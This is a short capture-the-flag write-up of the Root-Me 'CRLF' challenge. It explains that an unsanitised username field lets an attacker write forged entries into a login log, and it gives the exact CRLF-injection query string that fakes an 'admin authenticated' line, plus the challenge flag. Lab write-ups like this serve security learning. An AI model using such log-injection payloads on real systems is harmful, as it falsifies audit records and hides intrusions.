CRLF
- Points: 20
- Link: https://www.root-me.org/en/Challenges/Web-Server/CRLF
Statement
Inject false data in the journalisation log.
Analyzation
We need to write to the log
1
admin authenticated
The login form did not prevent the space! When I try admin a, it logs
1
admin a failed to authenticate
This is the vuln.
CRLF can be used to force logging a new line.
Solution
1
/?username=admin%20authenticated.%0d%0aguest&password=a
The flag is
1
rFSP&G0p&5uAg1%
Summarization
This post is licensed under CC BY 4.0 by the author.